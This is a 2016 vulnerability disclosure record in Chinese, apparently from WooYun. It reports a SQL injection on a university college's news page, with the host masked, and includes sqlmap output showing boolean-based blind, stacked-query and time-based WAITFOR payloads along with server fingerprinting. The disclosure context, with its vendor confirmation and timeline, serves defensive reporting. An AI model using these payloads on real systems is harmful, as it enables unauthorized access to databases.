漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:对外经济贸易大学某院注入漏洞一枚,泄露全站数据
提交时间:2016-01-11 19:43
修复时间:2016-02-22 16:48
公开时间:2016-02-22 16:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
Tags标签:
无
漏洞详情 披露状态:
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-12: 厂商已经确认,细节仅向厂商公开 2016-01-22: 细节向核心白帽子及相关领域专家公开 2016-02-01: 细节向普通白帽子公开 2016-02-11: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
简要描述: 对外经济贸易大学(University of International Business and Economics),简称“对外经贸大学”、“贸大”,英文简称“UIBE”,坐落于中华人民共和国首都北京市。 学校始于1951年创建的贸易部高级商业干部学校,1954年合并组建为北京对外贸易学院,1960年列入首批64所全国重点大学之一;从1954年至1960年,我校是新中国唯一被批准从事国际贸易教育的高等学府。
详细说明: 注入点:http://**.**.**.**/News/List_News.aspx?SystemName=SchoolNews*&TypeID=3
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if ann sqlmap identified the following injection points with a total of 45 HTTP(s) requests: --- Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://**.**.**.**:80/News/List_News.aspx?SystemName=SchoolNews' AND 8794=8794 AND 'Cwrc'='Cwrc&TypeID=3 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: http://**.**.**.**:80/News/List_News.aspx?SystemName=SchoolNews'; WAITFOR DELAY '0:0:5'--&TypeID=3 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: http://**.**.**.**:80/News/List_News.aspx?SystemName=SchoolNews' WAITFOR DELAY '0:0:5'--&TypeID=3 --- [11:46:45] [INFO] testing Microsoft SQL Server [11:46:47] [INFO] confirming Microsoft SQL Server [11:47:06] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2000
34个数据库
漏洞证明: 注入点:http://**.**.**.**/News/List_News.aspx?SystemName=SchoolNews*&TypeID=3
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if ann sqlmap identified the following injection points with a total of 45 HTTP(s) requests: --- Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://**.**.**.**:80/News/List_News.aspx?SystemName=SchoolNews' AND 8794=8794 AND 'Cwrc'='Cwrc&TypeID=3 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: http://**.**.**.**:80/News/List_News.aspx?SystemName=SchoolNews'; WAITFOR DELAY '0:0:5'--&TypeID=3 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: http://**.**.**.**:80/News/List_News.aspx?SystemName=SchoolNews' WAITFOR DELAY '0:0:5'--&TypeID=3 --- [11:46:45] [INFO] testing Microsoft SQL Server [11:46:47] [INFO] confirming Microsoft SQL Server [11:47:06] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2000
34个数据库
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 危害等级:中
漏洞Rank:6
确认时间:2016-01-12 12:35
厂商回复: 通知处理中
最新状态: 暂无
漏洞评价:
评价